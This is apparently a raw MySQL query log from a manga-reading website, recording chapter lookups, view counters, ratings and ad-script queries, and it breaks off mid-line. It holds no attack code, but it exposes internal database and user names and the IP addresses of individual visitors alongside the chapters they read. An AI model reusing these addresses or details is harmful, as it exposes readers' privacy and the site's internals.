Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648542 Quit 330648543 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330648543 Quit 330648544 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648545 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648544 Quit 330648545 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648545 Quit 330648546 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648547 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648546 Quit 330648547 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648547 Quit 330648548 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648549 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648548 Quit 330648549 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648549 Quit 260225 19:28:54 330648550 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648551 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648550 Quit 330648551 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2791' 330648551 Quit 330648552 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648552 Query select * FROM chapters where id = '2791' 330648552 Quit 330648553 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648553 Query select * FROM chapters where manga_id = '27' order by id desc 330648553 Quit 330648554 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648554 Query Update chapters set view=view+1 where id = '2791' 330648554 Quit 330648555 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648555 Query select * FROM chapters where id = '2791' 330648555 Quit 330648556 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648556 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2791' 330648556 Quit 330648557 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648557 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('27', '2791', '103.151.74.181', 'mangacherri.com', '2026-02-26 03:28:54', '2026-02-26 03:28:54') 330648557 Quit 330648558 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648558 Query select * FROM chapter_images where chapter_id = '2791' 330648558 Quit 330648559 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648559 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '27' and m.active = 1 330648559 Quit 330648560 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648560 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='27' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%') ORDER BY RAND() limit 10 330648561 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648562 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648561 Quit 330648562 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12398' 330648562 Quit 330648563 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648563 Query select * FROM chapters where id = '12398' 330648563 Quit 330648564 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648564 Query select * FROM chapters where manga_id = '58' order by id desc 330648564 Quit 330648565 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648565 Query Update chapters set view=view+1 where id = '12398' 330648565 Quit 330648566 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648566 Query select * FROM chapters where id = '12398' 330648567 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648567 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12398' 330648566 Quit 330648567 Quit 330648568 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648568 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('58', '12398', '130.193.211.3', 'mangacherri.com', '2026-02-26 03:28:54', '2026-02-26 03:28:54') 330648568 Quit 330648569 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648569 Query select * FROM chapter_images where chapter_id = '12398' 330648569 Quit 330648570 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648570 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '58' and m.active = 1 330648570 Quit 330648571 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648571 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='58' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330648560 Quit 330648572 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648573 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648572 Quit 330648573 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330648573 Quit 330648574 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648575 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648574 Quit 330648575 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648575 Quit 330648576 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648577 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648576 Quit 330648577 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648577 Quit 330648578 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648579 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648578 Quit 330648579 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648579 Quit 330648571 Quit 330648580 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648581 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648580 Quit 330648581 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330648581 Quit 330648582 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648583 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648582 Quit 330648583 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648583 Quit 330648584 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648585 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648584 Quit 330648585 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648585 Quit 330648586 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648587 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648586 Quit 330648587 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648587 Quit 260225 19:28:55 330648588 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648589 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648589 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12505' 330648588 Quit 330648589 Quit 330648590 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648590 Query select * FROM chapters where id = '12505' 330648590 Quit 330648591 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648591 Query select * FROM chapters where manga_id = '239' order by id desc 330648591 Quit 330648592 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648592 Query Update chapters set view=view+1 where id = '12505' 330648592 Quit 330648593 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648593 Query select * FROM chapters where id = '12505' 330648593 Quit 330648594 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648594 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12505' 330648594 Quit 330648595 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648595 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('239', '12505', '2001:550:9801:671e:3921:2f2d:2800:604c', 'mangacherri.com', '2026-02-26 03:28:55', '2026-02-26 03:28:55') 330648595 Quit 330648596 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648596 Query select * FROM chapter_images where chapter_id = '12505' 330648596 Quit 330648597 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648597 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '239' and m.active = 1 330648597 Quit 330648598 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648598 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='239' and m.active = 1 AND (genres like '%Animals%' OR genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shounen%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330648598 Quit 330648599 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648600 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648599 Quit 330648600 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330648600 Quit 330648601 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648602 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648601 Quit 330648602 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648602 Quit 330648603 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648604 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648603 Quit 330648604 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648604 Quit 330648605 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648606 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648605 Quit 330648606 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648606 Quit 260225 19:28:56 330648607 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648608 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648607 Quit 330648608 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12583' 330648608 Quit 330648609 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648609 Query select * FROM chapters where id = '12583' 330648609 Quit 330648610 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648610 Query select * FROM chapters where manga_id = '206' order by id desc 330648610 Quit 330648611 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648611 Query Update chapters set view=view+1 where id = '12583' 330648611 Quit 330648612 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648612 Query select * FROM chapters where id = '12583' 330648612 Quit 330648613 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648613 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12583' 330648613 Quit 330648614 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648614 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('206', '12583', '176.41.24.80', 'mangacherri.com', '2026-02-26 03:28:56', '2026-02-26 03:28:56') 330648614 Quit 330648615 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648615 Query select * FROM chapter_images where chapter_id = '12583' 330648615 Quit 330648616 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648616 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '206' and m.active = 1 330648616 Quit 330648617 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648617 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='206' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Mystery%' OR genres like '%Psychological%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Seinen%') ORDER BY RAND() limit 10 330648618 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648619 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648618 Quit 330648619 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id) group by r.manga_id) as k ORDER BY RAND() DESC limit 10 330648620 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648621 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648620 Quit 330648621 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330648621 Quit 330648617 Quit 330648622 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648623 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648622 Quit 330648623 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330648623 Quit 330648624 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648625 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648624 Quit 330648625 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648625 Quit 330648626 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648627 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648626 Quit 330648627 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648627 Quit 330648628 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648629 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648629 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648628 Quit 330648629 Quit 330648619 Quit 330648630 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648630 Query select max(c.id) as chapter_id, m.* from chapters as c join mangas as m on (m.id = c.manga_id) where m.active = 1 group by m.id order by chapter_id desc limit 30 260225 19:28:57 330648630 Quit 330648631 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648631 Query SELECT stats.total_view, stats.latest_chapter_id, latest_chapter.name AS latest_chapter, m.* FROM ( SELECT c.manga_id, SUM(c.view) AS total_view, MAX(c.id) AS latest_chapter_id FROM chapters AS c GROUP BY c.manga_id ) AS stats JOIN chapters AS latest_chapter ON latest_chapter.id = stats.latest_chapter_id JOIN mangas AS m ON m.id = stats.manga_id WHERE m.active = 1 ORDER BY stats.total_view DESC 330648631 Quit 330648632 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648632 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id AND m.status = 'Finished') group by r.manga_id) as k ORDER BY k.id DESC 330648633 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648634 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648633 Quit 330648634 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id) group by r.manga_id) as k ORDER BY RAND() DESC limit 10 330648632 Quit 330648635 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648636 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648635 Quit 330648636 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2028' 330648636 Quit 330648637 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648637 Query select * FROM chapters where id = '2028' 330648637 Quit 330648638 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648638 Query select * FROM chapters where manga_id = '51' order by id desc 330648638 Quit 330648639 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648639 Query Update chapters set view=view+1 where id = '2028' 330648639 Quit 330648640 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648640 Query select * FROM chapters where id = '2028' 330648640 Quit 330648641 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648641 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2028' 330648641 Quit 330648642 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648642 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('51', '2028', '115.70.62.74', 'mangacherri.com', '2026-02-26 03:28:57', '2026-02-26 03:28:57') 330648642 Quit 330648643 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648643 Query select * FROM chapter_images where chapter_id = '2028' 330648643 Quit 330648644 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648644 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '51' and m.active = 1 330648644 Quit 330648645 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648645 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='51' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330648634 Quit 330648646 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648646 Query select max(c.id) as chapter_id, m.* from chapters as c join mangas as m on (m.id = c.manga_id) where m.active = 1 group by m.id order by chapter_id desc limit 30 330648646 Quit 330648647 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648647 Query SELECT stats.total_view, stats.latest_chapter_id, latest_chapter.name AS latest_chapter, m.* FROM ( SELECT c.manga_id, SUM(c.view) AS total_view, MAX(c.id) AS latest_chapter_id FROM chapters AS c GROUP BY c.manga_id ) AS stats JOIN chapters AS latest_chapter ON latest_chapter.id = stats.latest_chapter_id JOIN mangas AS m ON m.id = stats.manga_id WHERE m.active = 1 ORDER BY stats.total_view DESC 330648647 Quit 330648648 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648648 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id AND m.status = 'Finished') group by r.manga_id) as k ORDER BY k.id DESC 330648649 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648650 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648649 Quit 330648650 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '14619' 330648650 Quit 330648651 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648651 Query select * FROM chapters where id = '14619' 330648651 Quit 330648652 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648652 Query select * FROM chapters where manga_id = '80' order by id desc 330648652 Quit 330648653 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648653 Query Update chapters set view=view+1 where id = '14619' 330648653 Quit 330648654 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648654 Query select * FROM chapters where id = '14619' 330648654 Quit 330648655 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648655 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '14619' 330648655 Quit 330648656 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648656 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('80', '14619', '79.186.239.92', 'mangacherri.com', '2026-02-26 03:28:57', '2026-02-26 03:28:57') 330648656 Quit 330648657 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648657 Query select * FROM chapter_images where chapter_id = '14619' 330648657 Quit 330648658 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648658 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '80' and m.active = 1 330648658 Quit 330648659 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648659 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='80' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330648648 Quit 330648660 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648661 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648660 Quit 330648661 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330648661 Quit 330648662 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648662 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330648662 Quit 330648663 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648663 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330648663 Quit 330648664 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648664 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330648664 Quit 330648665 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648665 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330648665 Quit 330648666 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648666 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330648666 Quit 330648667 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648667 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330648667 Quit 330648668 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648668 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330648668 Quit 330648669 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648669 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330648669 Quit 330648670 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648670 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330648670 Quit 330648671 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648671 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330648671 Quit 330648672 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648672 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330648672 Quit 330648673 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648673 Query select * FROM chapters where manga_id = '387' order by created desc limit 1 330648673 Quit 330648674 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648674 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330648674 Quit 330648675 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648675 Query select * FROM chapters where manga_id = '272' order by created desc limit 1 330648675 Quit 330648676 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648676 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330648676 Quit 330648677 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648677 Query select * FROM chapters where manga_id = '361' order by created desc limit 1 330648677 Quit 330648678 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648678 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330648678 Quit 330648679 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648679 Query select * FROM chapters where manga_id = '57' order by created desc limit 1 330648679 Quit 330648680 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648680 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330648680 Quit 330648681 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648681 Query select * FROM chapters where manga_id = '285' order by created desc limit 1 330648681 Quit 330648682 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648682 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330648682 Quit 330648683 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648683 Query select * FROM chapters where manga_id = '104' order by created desc limit 1 330648683 Quit 330648684 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648684 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330648684 Quit 330648685 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648685 Query select * FROM chapters where manga_id = '290' order by created desc limit 1 330648685 Quit 330648686 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648686 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330648686 Quit 330648687 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648687 Query select * FROM chapters where manga_id = '40' order by created desc limit 1 330648687 Quit 330648688 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648688 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330648688 Quit 330648689 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648689 Query select * FROM chapters where manga_id = '386' order by created desc limit 1 330648645 Quit 330648690 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648691 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648690 Quit 330648691 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330648691 Quit 330648692 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648693 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648692 Quit 330648693 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648693 Quit 330648694 Connect mangauser@localhost on 